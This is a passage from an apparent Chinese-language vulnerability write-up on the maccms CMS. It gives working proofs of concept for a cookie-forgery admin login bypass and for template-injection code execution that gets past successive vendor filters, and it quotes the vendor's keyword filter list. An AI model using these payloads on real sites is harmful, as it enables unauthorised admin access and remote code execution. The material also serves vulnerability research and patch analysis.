<figure class="highlight inform7"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs inform7">admin_id<span class="hljs-comment">[]</span>=like;admin_id<span class="hljs-comment">[]</span>=%; admin_name<span class="hljs-comment">[]</span>=like;admin_name<span class="hljs-comment">[]</span>=%<br></code></pre></td></tr></table></figure>

<p>这样将会查询到admin表中的第一个账号，一般第一个账号都是权限最大的，够用了，也可以尝试控制id，模糊匹配用户名</p>
<p>2）条件2，md5验证</p>
<p><code>$admin_check</code> 将会和数据库中查询到的 id，admin_name，admin_random做md5验证，因为 admin_random 这里是无法获取的，这三者的加密值必定一串未知md5加密字符串，不过利用 TP5 特性，可控制 <code>$admin_check</code>  为 <strong>true</strong>，造成弱类型相等</p>
<h3 id="最终poc"><a href="#最终poc" class="headerlink" title="最终poc"></a>最终poc</h3><p>所以最终的poc如下：</p>
<figure class="highlight inform7"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs inform7">Cookie: admin_id<span class="hljs-comment">[]</span>=like;admin_id<span class="hljs-comment">[]</span>=%; admin_name<span class="hljs-comment">[]</span>=like;admin_name<span class="hljs-comment">[]</span>=%; admin_check=think:true<br></code></pre></td></tr></table></figure>

<p>该漏洞的poc网上还没有见到公布，但我对该漏洞也比较感兴趣</p>
<p>后面发现零组在2021年10月5号更新了该漏洞，可惜可惜，零组上的poc更加精简一些</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">Cookie: <span class="hljs-attribute">admin_id</span>=think:[<span class="hljs-string">&quot;like&quot;</span>,<span class="hljs-string">&quot;%&quot;</span>]; <span class="hljs-attribute">admin_name</span>=think:[<span class="hljs-string">&quot;like&quot;</span>,<span class="hljs-string">&quot;%&quot;</span>]; <span class="hljs-attribute">admin_check</span>=think:true<br></code></pre></td></tr></table></figure>

<h2 id="简单总结"><a href="#简单总结" class="headerlink" title="简单总结"></a>简单总结</h2><p>在 v2020.1000.1035 版本以前存在漏洞，该漏洞的核心是弱类型比较，但也用到了很多 TP5 的特性，挖掘该漏洞还需要对 TP5 的框架代码十分了解</p>
<p>v2020.1000.1042（2020.11.9）代码如下图，不知道维护者是有意还是无意，对 cookie 的值做了 urldecode() 操作，该操作最直接的影响就是 <code>$admin_check</code> 的值无法控制为布尔类型的 <strong>true</strong>，所以该漏洞基本也就修复了。另外 $where 也指定了 ‘eq’ 操作，这样的写法更加严谨一点</p>
<img src="img/maccms/image-20211108145154393.png" srcset="/img/loading.gif" lazyload alt="image-20211108145154393" style="zoom:50%;" />

<p>在 v2020.1000.1062(2021.1.25) 版本中，将使用session处理会话，该漏洞基本就宣告结束了</p>
<img src="img/maccms/image-20211108145911689.png" srcset="/img/loading.gif" lazyload alt="image-20211108145911689" style="zoom:50%;" />

<h1 id="后台任意文件写入"><a href="#后台任意文件写入" class="headerlink" title="后台任意文件写入"></a>后台任意文件写入</h1><p>后台【模板】=&gt;【模板管理】功能处可以添加修改模板文件，该功能会造成任意文件写入，再利用 TP5 的模板解析特性，可能会执行写入的代码</p>
<h2 id="代码分析-2"><a href="#代码分析-2" class="headerlink" title="代码分析"></a>代码分析</h2><p>下面代码来自 v2020.1000.1035 版本</p>
<ul>
<li><code>$fname，$fpath</code> 会指定模板文件的位置，其后缀被白名单限制，只能为 array(‘html’, ‘htm’, ‘js’, ‘xml’) 其中之一</li>
<li><code>$fcontent</code> 为写入模板文件的内容，其内容禁止存在 <code>&lt;?</code> ,<code>&#123;php&#125;</code> 字符的字样，其实在早期版本中，甚至还没有该条过滤，很容易写入php代码，当时的漏洞编号为 CVE-2019-9829，可惜在github上没有找到cve漏洞源码。虽然现在过滤了一些php格式的字符，但仍然有绕过的机会，所以本文主要分析绕过漏洞修复的情况</li>
</ul>
<p>通过分析代码，我们可以写入一个html后缀的静态文件，静态文件是没法被解析的。但这里又利用了 TP5 模板解析的特性，TP5在模板解析时会把静态模板文件编译成php后缀的缓存文件，然后被包含在对应的控制器代码中，从而输出视图</p>
<p>所以在 TP5 中，只要能控制静态文件的内容，如在静态文件中写入 <code>&lt;?php phpinfo();?&gt;</code> ，这段代码最终也会被包含在控制器中从而被解析执行，所以这里我们只要想办法在模板文件中写入 php 代码即可</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//	application/admin/controller/Template.php</span><br><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">info</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$param</span> = input();<br>    <span class="hljs-variable">$fname</span> = <span class="hljs-variable">$param</span>[<span class="hljs-string">&#x27;fname&#x27;</span>];<br>    <span class="hljs-variable">$fpath</span> = <span class="hljs-variable">$param</span>[<span class="hljs-string">&#x27;fpath&#x27;</span>];<br><br>    <span class="hljs-keyword">if</span>( <span class="hljs-keyword">empty</span>(<span class="hljs-variable">$fpath</span>))&#123;<br>        <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&#x27;参数错误1&#x27;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    <span class="hljs-variable">$fpath</span> = str_replace(<span class="hljs-string">&#x27;@&#x27;</span>,<span class="hljs-string">&#x27;/&#x27;</span>,<span class="hljs-variable">$fpath</span>);<br>    <span class="hljs-variable">$fullname</span> = <span class="hljs-variable">$fpath</span> .<span class="hljs-string">&#x27;/&#x27;</span> .<span class="hljs-variable">$fname</span>;<br>    <span class="hljs-variable">$fullname</span> = str_replace(<span class="hljs-string">&#x27;\\&#x27;</span>,<span class="hljs-string">&#x27;/&#x27;</span>,<span class="hljs-variable">$fullname</span>);<br><br>    <span class="hljs-keyword">if</span>( (substr(<span class="hljs-variable">$fullname</span>,<span class="hljs-number">0</span>,<span class="hljs-number">10</span>) != <span class="hljs-string">&quot;./template&quot;</span>) || count( explode(<span class="hljs-string">&quot;./&quot;</span>,<span class="hljs-variable">$fullname</span>) ) &gt; <span class="hljs-number">2</span>) &#123;<br>        <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&#x27;参数错误2&#x27;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    <span class="hljs-variable">$path</span> = pathinfo(<span class="hljs-variable">$fullname</span>);<br>    <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$fname</span>)) &#123;<br>        <span class="hljs-variable">$extarr</span> = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;html&#x27;</span>, <span class="hljs-string">&#x27;htm&#x27;</span>, <span class="hljs-string">&#x27;js&#x27;</span>, <span class="hljs-string">&#x27;xml&#x27;</span>);<br>        <span class="hljs-keyword">if</span> (!in_array(<span class="hljs-variable">$path</span>[<span class="hljs-string">&#x27;extension&#x27;</span>], <span class="hljs-variable">$extarr</span>)) &#123;<br>            <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&#x27;参数错误，后缀名只允许htm,html,js,xml&#x27;</span>);<br>            <span class="hljs-keyword">return</span>;<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-keyword">if</span> (Request()-&gt;isPost()) &#123;<br>        <span class="hljs-variable">$fcontent</span> = <span class="hljs-variable">$param</span>[<span class="hljs-string">&#x27;fcontent&#x27;</span>];<br>        <span class="hljs-keyword">if</span>(strpos(<span class="hljs-variable">$fcontent</span>,<span class="hljs-string">&#x27;&lt;?&#x27;</span>)!==<span class="hljs-literal">false</span> || strpos(<span class="hljs-variable">$fcontent</span>,<span class="hljs-string">&#x27;&#123;php&#125;&#x27;</span>)!==<span class="hljs-literal">false</span>)&#123;<br>            <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&#x27;安全提示，模板中包含php代码禁止在后台编辑&#x27;</span>);<br>            <span class="hljs-keyword">return</span>;<br>        &#125;<br>        <span class="hljs-variable">$res</span> = @fwrite(fopen(<span class="hljs-variable">$fullname</span>,<span class="hljs-string">&#x27;wb&#x27;</span>),<span class="hljs-variable">$fcontent</span>);<br>				……<br>    &#125;<br><br>    <span class="hljs-variable">$fcontent</span> = @file_get_contents(<span class="hljs-variable">$fullname</span>);<br>    <span class="hljs-variable">$fcontent</span> = str_replace(<span class="hljs-string">&#x27;&lt;/textarea&gt;&#x27;</span>,<span class="hljs-string">&#x27;&lt;&amp;#47textarea&gt;&#x27;</span>,<span class="hljs-variable">$fcontent</span>);<br>    <span class="hljs-keyword">$this</span>-&gt;assign(<span class="hljs-string">&#x27;fname&#x27;</span>,<span class="hljs-variable">$fname</span>);<br>    <span class="hljs-keyword">$this</span>-&gt;assign(<span class="hljs-string">&#x27;fpath&#x27;</span>,<span class="hljs-variable">$fpath</span>);<br>    <span class="hljs-keyword">$this</span>-&gt;assign(<span class="hljs-string">&#x27;fcontent&#x27;</span>,<span class="hljs-variable">$fcontent</span>);<br><br>    <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;fetch(<span class="hljs-string">&#x27;admin@template/info&#x27;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<h2 id="漏洞利用-2"><a href="#漏洞利用-2" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>这个漏洞存在很久了，从 maccms.la 维护的代码来看，该漏洞被修复了几次，在实战中需要根据情况利用</p>
<p>在 CVE-2019-9829 中，该漏洞第一次被提出，不过那时代码我也找不到了，当时的代码只允许修改 .html 这种静态文件，却忽略了写入php代码会被TP5的模板引擎编译后解析的情况</p>
<p>现在能找到的最早的代码是 v2020.1000.1035 ，就是上面分析的代码，限制了写入内容具有php标记的情况</p>
<p>在 v2020.1000.1035 版本中，过滤了更多内容，则表示写入内容中不能有这些字符</p>
<p><img src="img/maccms/image-20211109144512814.png" srcset="/img/loading.gif" lazyload alt="image-20211109144512814"></p>
<p>在 2021.9.9 日的更新中（该更新没有打tags，后台显示版本号为v2022.1000.3024，感觉maccms.la维护不太专业的），过滤内容如下，在maccmspro版本中没有做该修复</p>
<p><img src="img/maccms/image-20211109145248919.png" srcset="/img/loading.gif" lazyload alt="image-20211109145248919"></p>
<h3 id="更换标记风格"><a href="#更换标记风格" class="headerlink" title="更换标记风格"></a>更换标记风格</h3><p>php的 4 种标记风格：<a target="_blank" rel="noopener" href="http://c.biancheng.net/view/7256.html">http://c.biancheng.net/view/7256.html</a></p>
<p>其实 php 有如下4种标记风格：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>	…… <span class="hljs-meta">?&gt;</span><br><span class="hljs-meta">&lt;?</span> …… <span class="hljs-meta">?&gt;</span>		<span class="hljs-comment">//启用 short_open_tag</span><br>&lt;% …… %&gt;		<span class="hljs-comment">//启用 asp_tags  php7不支持</span><br>&lt;script language=<span class="hljs-string">&quot;php&quot;</span>&gt;……&lt;/script&gt;	<span class="hljs-comment">//php7 不支持</span><br></code></pre></td></tr></table></figure>

<p>第三种和第四种能绕过 <code>&lt;?</code> 的过滤，本地测试第4种有效，不过不支持 php7 版本</p>
<h4 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">&lt;script language=<span class="hljs-string">&quot;php&quot;</span>&gt;<br>phpinfo();<br>&lt;/script&gt;	<br></code></pre></td></tr></table></figure>

<p>需要在php5中执行，另外在后面的修复版本中过滤了php字符，该poc会无效</p>
<h3 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h3><p>先了解下tp5模板引擎的include标签，该标签可以实现文件包含，用法如下，被包含模板文件的起始目录应该为web部署目录</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;<span class="hljs-keyword">include</span> file=<span class="hljs-string">&#x27;模版文件1,模版文件2,...&#x27;</span> /&#125;<br></code></pre></td></tr></table></figure>

<p>我们便可以考虑上传一个含有php代码的文件，然后利用模板编辑的功能使其包含上传的文件</p>
<p>1）上传文件</p>
<p>后台有很多地方可以上传文件，我选择的功能是【文章】-&gt;【添加文章】,上传文件后可以看到文件内容</p>
<img src="img/maccms/image-20211109114147132.png" srcset="/img/loading.gif" lazyload alt="image-20211109114147132" style="zoom:50%;" />

<p>注意这里会使用 finfo_file() 检测上传文件是否是php文件格式，绕过也很简单，在第一行加一些字符串就行，如我上传的文件如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">111111</span><br><span class="hljs-meta">&lt;?php</span> phpinfo();<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>2）编辑模板</p>
<p>这里选一个我们能访问到的模板，为了方便我直接选择了前台首页的模板，在实战中要注意了，网站首页动静还是很大的</p>
<p>添加include标签，包含我们上传的文件，然后保存即可</p>
<img src="img/maccms/image-20211109114602019.png" srcset="/img/loading.gif" lazyload alt="image-20211109114602019" style="zoom:50%;" />

<p>3）检验成果</p>
<p>访问首页即可看到我们修改的模板已经被包含进去了</p>
<img src="img/maccms/image-20211109114738315.png" srcset="/img/loading.gif" lazyload alt="image-20211109114738315" style="zoom:50%;" />

<p>最后可以看看缓存文件被编译成了什么样子</p>
<img src="img/maccms/image-20211109114839672.png" srcset="/img/loading.gif" lazyload alt="image-20211109114839672" style="zoom:50%;" />

<h4 id="poc-1"><a href="#poc-1" class="headerlink" title="poc"></a>poc</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;<span class="hljs-keyword">include</span> file=<span class="hljs-string">&quot;upload/art_editor/20211109-1/fa8ae56a1bada27ac2c4edae0f7cbddb.txt&quot;</span> /&#125;<br></code></pre></td></tr></table></figure>

<p>在最新修复版本中过滤了 file 字符，导致该poc无效。file 字符都被被过滤了，include没过滤，这种修复方式还是有点奇怪的，我下的主题大多模板文件本身就有file字符，该功能在这种情况下形同摆设</p>
<h3 id="特殊标签"><a href="#特殊标签" class="headerlink" title="特殊标签"></a>特殊标签</h3><h4 id="代码分析-3"><a href="#代码分析-3" class="headerlink" title="代码分析"></a>代码分析</h4><p>上面说道 <code>&#123;include&#125;</code> 这样的标签会被编译成文件包含的php语法，其实这里还有其他标签格式可以绕过最新的修复，这里先看看 TP5 是如何编译这些标签的</p>
<p>TP5 编译模板位于 <code>\think\Template</code> 类的 compiler() 方法，代码如下：</p>
<ul>
<li><code>$content</code> 就是静态模板文件读出来的内容</li>
<li>parseInclude() 就是上面解析include标签的函数，这里就不关注其中的代码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//	thinkphp/library/think/Template.php</span><br><span class="hljs-keyword">private</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">compiler</span>(<span class="hljs-params">&amp;<span class="hljs-variable">$content</span>, <span class="hljs-variable">$cacheFile</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>  	<span class="hljs-comment">// 模板解析</span><br>    <span class="hljs-keyword">$this</span>-&gt;parse(<span class="hljs-variable">$content</span>);<br><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">parse</span>(<span class="hljs-params">&amp;<span class="hljs-variable">$content</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>  	……<br>  	<span class="hljs-comment">// 检查include语法</span><br>    <span class="hljs-keyword">$this</span>-&gt;parseInclude(<span class="hljs-variable">$content</span>);<br>  	……<br>    <span class="hljs-comment">// 解析普通模板标签 &#123;$tagName&#125;</span><br>  	<span class="hljs-keyword">$this</span>-&gt;parseTag(<span class="hljs-variable">$content</span>);<br>  	……<br></code></pre></td></tr></table></figure>

<p>下面重点关注 parseTag() 的代码，该函数最常见的解析规则如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">Hello,&#123;<span class="hljs-variable">$name</span>&#125;！<br>Hello,<span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span>(<span class="hljs-variable">$name</span>);<span class="hljs-meta">?&gt;</span>！<br></code></pre></td></tr></table></figure>

<p>标签 {$…} 包裹的内容就是 php 要输出的内容，粗略看一下 parseTag() 的代码会发现，解析标签不止有{$}，还有其他很多情况，而大佬们就发现了这样的场景，佩服佩服呀！</p>
<img src="img/maccms/image-20211109172840803.png" srcset="/img/loading.gif" lazyload alt="image-20211109172840803" style="zoom:50%;" />

<p>根据网上流出payload，先看标签 {:} 的代码</p>
<ul>
<li>$regex 是正则表达式，用于抓取如<code>&#123;$name&#125;</code>这样的标签结构，$match 是其中的一个匹配结果，其中$match[1] 是第一个匹配子组，就是剥离{}符号里面的内容，即<code>$name</code>，该值赋值给 $str</li>
<li>$str 的第一个字符作为 $flag，决定该标签的解析方式，这里查看第一个字符为 <code>:</code> 的情况</li>
<li>$str 会去掉第一个字符，然后被 parseVar() 处理后直接放到 <code>&lt;?php echo $str; ?&gt;</code>，所以保证$str内容即可，下面看下 parseVar() 的代码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">private</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">parseTag</span>(<span class="hljs-params">&amp;<span class="hljs-variable">$content</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>		<span class="hljs-variable">$regex</span> = <span class="hljs-keyword">$this</span>-&gt;getRegex(<span class="hljs-string">&#x27;tag&#x27;</span>);<br>		<span class="hljs-keyword">if</span> (preg_match_all(<span class="hljs-variable">$regex</span>, <span class="hljs-variable">$content</span>, <span class="hljs-variable">$matches</span>, PREG_SET_ORDER)) &#123;<br>    		<span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$matches</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$match</span>) &#123;<br>        		<span class="hljs-variable">$str</span>  = stripslashes(<span class="hljs-variable">$match</span>[<span class="hljs-number">1</span>]);<br>            <span class="hljs-variable">$flag</span> = substr(<span class="hljs-variable">$str</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>);<br>            <span class="hljs-keyword">switch</span> (<span class="hljs-variable">$flag</span>) &#123;<br>								<span class="hljs-keyword">case</span> <span class="hljs-string">&#x27;:&#x27;</span>:<br>                    <span class="hljs-comment">// 输出某个函数的结果</span><br>                    <span class="hljs-variable">$str</span> = substr(<span class="hljs-variable">$str</span>, <span class="hljs-number">1</span>);<br>                    <span class="hljs-keyword">$this</span>-&gt;parseVar(<span class="hljs-variable">$str</span>);<br>                    <span class="hljs-variable">$str</span> = <span class="hljs-string">&#x27;&lt;?php echo &#x27;</span> . <span class="hljs-variable">$str</span> . <span class="hljs-string">&#x27;; ?&gt;&#x27;</span>;<br>                    <span class="hljs-keyword">break</span>;<br></code></pre></td></tr></table></figure>

<p>parseVar() 的代码如下：</p>
<ul>
<li>这里有个很关键的正则匹配，匹配结果如下图，这个正则会匹配 <code>$aaa.bbb,$aaa:bbb</code> 的参数形式</li>
</ul>
<img src="img/maccms/image-20211110102930865.png" srcset="/img/loading.gif" lazyload alt="image-20211110102930865" style="zoom:50%;" />

<blockquote>
<p>这是一个将正则表达式转换为图片的网站：<a target="_blank" rel="noopener" href="https://jex.im/regulex">jex.im</a>    通过图片更好理解正则表达式</p>
<p>另外这里有个正则规则 <code>?&gt;</code> 一直没有百度到是什么，我转换为了 <code>?:</code> 理解</p>
</blockquote>
<ul>
<li>没有匹配到正则 则不做处理</li>
<li>通过正则匹配的代码我也没有细看，通过调试大概知道是怎样的转换形式</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">parseVar</span>(<span class="hljs-params">&amp;<span class="hljs-variable">$varStr</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$varStr</span> = trim(<span class="hljs-variable">$varStr</span>);<br>    <span class="hljs-keyword">if</span> (preg_match_all(<span class="hljs-string">&#x27;/\$[a-zA-Z_](?&gt;\w*)(?:[:\.][0-9a-zA-Z_](?&gt;\w*))+/&#x27;</span>, <span class="hljs-variable">$varStr</span>, <span class="hljs-variable">$matches</span>, PREG_OFFSET_CAPTURE)) &#123;<br>        ……&#125;<br>    <span class="hljs-keyword">return</span>；<br></code></pre></td></tr></table></figure>

<p>最后来总结下，会有一下的转换形式</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1</span>）未匹配到正则，不处理<br>&#123;:aaa&#125;	=&gt;	aaa		=&gt;	<span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span> aaa; <span class="hljs-meta">?&gt;</span><br><span class="hljs-number">2</span>）数组参数<br>&#123;:<span class="hljs-variable">$aaa</span>.bbb&#125;	=&gt;	<span class="hljs-variable">$aaa</span>[<span class="hljs-string">&#x27;bbb&#x27;</span>]	=&gt;	<span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span> <span class="hljs-variable">$aaa</span>[<span class="hljs-string">&#x27;bbb&#x27;</span>]; <span class="hljs-meta">?&gt;</span><br><span class="hljs-number">3</span>）对象属性<br>&#123;:<span class="hljs-variable">$aaa</span>:bbb&#125;	=&gt;	<span class="hljs-variable">$aaa</span>-&gt;bbb		=&gt;	<span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span> <span class="hljs-variable">$aaa</span>-&gt;bbb; <span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>我们可以充分利用这个规则，写出如下格式：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;:<span class="hljs-variable">$a</span>=<span class="hljs-string">&quot;phpinfo&quot;</span>;<span class="hljs-variable">$a</span>()&#125;	=&gt;	<span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span> <span class="hljs-variable">$a</span>=<span class="hljs-string">&quot;phpinfo()&quot;</span>;<span class="hljs-variable">$a</span>(); <span class="hljs-meta">?&gt;</span><br><span class="hljs-comment">// 如果过滤了敏感字符，采用如下格式绕过</span><br>&#123;:<span class="hljs-variable">$a</span>=<span class="hljs-string">&quot;ph&quot;</span>.<span class="hljs-string">&quot;pinfo&quot;</span>;<span class="hljs-variable">$a</span>()&#125;<br></code></pre></td></tr></table></figure>

<p>然后看看模板编译结果：</p>
<img src="img/maccms/image-20211110112705189.png" srcset="/img/loading.gif" lazyload alt="image-20211110112705189" style="zoom:50%;" />

<p>在 v2022.1000.3024 版本中，便做了如下限制，<code>&#123;:</code> 符号也被过滤了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$filter</span> = <span class="hljs-string">&#x27;&lt;\?|php|eval|server|assert|get|post|request|cookie|session|input|env|config|call|global|dump|print|phpinfo|fputs|fopen|global|chr|strtr|pack|system|gzuncompress|shell|base64|file|proc|preg|call|ini|&#123;:&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>但是看代码，其实 $flag 为 <code>~、-、+</code> 符号时，处理是一样的，所以这个修复方案并没有解决问题，也从另外一个方面看出了代码维护者对漏洞原理或TP5底层代码并不熟悉</p>
<img src="img/maccms/image-20211110113331918.png" srcset="/img/loading.gif" lazyload alt="image-20211110113331918" style="zoom:50%;" />

<h4 id="poc-2"><a href="#poc-2" class="headerlink" title="poc"></a>poc</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;~<span class="hljs-variable">$a</span>=<span class="hljs-string">&quot;ph&quot;</span>.<span class="hljs-string">&quot;pinfo&quot;</span>;<span class="hljs-variable">$a</span>()&#125;<br></code></pre></td></tr></table></figure>

<h4 id="实战利用"><a href="#实战利用" class="headerlink" title="实战利用"></a>实战利用</h4><p>maccms 最新版本号是 v2022.1000.3024，这个版本在修改模板时过滤了很多字符串，导致模板文件本身的字符串也也被过滤了，导致整个功能显得有点鸡肋</p>
<p>为了利用这个功能，需要找到一个没有一点敏感字符的模板文件，我写了个脚本完成了这部分工作：</p>
<img src="img/maccms/image-20211110184609072.png" srcset="/img/loading.gif" lazyload alt="image-20211110184609072" style="zoom:50%;" />

<p>我这里找到一个不需要登陆的模板 public/paging（不同的主题模板文件不同），该模板被 vod/search.html 包含，vod/search 可直接访问。在后台修改 模板 public/paging ，插入poc：</p>
<img src="img/maccms/image-20211110185307718.png" srcset="/img/loading.gif" lazyload alt="image-20211110185307718" style="zoom:50%;" />

<p>然后访问使用到该模板的地方</p>
<img src="img/maccms/image-20211110185350700.png" srcset="/img/loading.gif" lazyload alt="image-20211110185350700" style="zoom:50%;" />

<h1 id="后台利用数据库功能"><a href="#后台利用数据库功能" class="headerlink" title="后台利用数据库功能"></a>后台利用数据库功能</h1><p>Maccms 后台有一个执行 sql 语句的地方，位于【数据库】-》【执行SQL语句】</p>
<img src="img/maccms/image-20211110185656727.png" srcset="/img/loading.gif" lazyload alt="image-20211110185656727" style="zoom:50%;" />

<h2 id="代码分析-4"><a href="#代码分析-4" class="headerlink" title="代码分析"></a>代码分析</h2><ul>
<li><code>$sql</code> 是客户端的参数，也就是要执行的sql语句</li>
<li><code>$sql</code> 以 select 字符开头不会进行任何处理，但这里是很好绕过的，可以看出这里本意是不想执行查询操作的。否则 <code>$sql</code> 将会用 <code>Db::execute()</code> 执行，<code>Db::execute()</code> 是 TP5 封装的执行原生sql的方法，是没有任何过滤的，所以利用这个功能我们是可以执行任意sql语句</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//	application/admin/controller/Database.php</span><br><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">sql</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">$this</span>-&gt;request-&gt;isPost())&#123;<br>        <span class="hljs-variable">$param</span>=input();<br>        <span class="hljs-variable">$sql</span> = trim(<span class="hljs-variable">$param</span>[<span class="hljs-string">&#x27;sql&#x27;</span>]);<br><br>        <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$sql</span>))&#123;<br>            <span class="hljs-variable">$sql</span> = str_replace(<span class="hljs-string">&#x27;&#123;pre&#125;&#x27;</span>,config(<span class="hljs-string">&#x27;database.prefix&#x27;</span>),<span class="hljs-variable">$sql</span>);<br>            <span class="hljs-comment">//查询语句返回结果集</span><br>            <span class="hljs-keyword">if</span>(strtolower(substr(<span 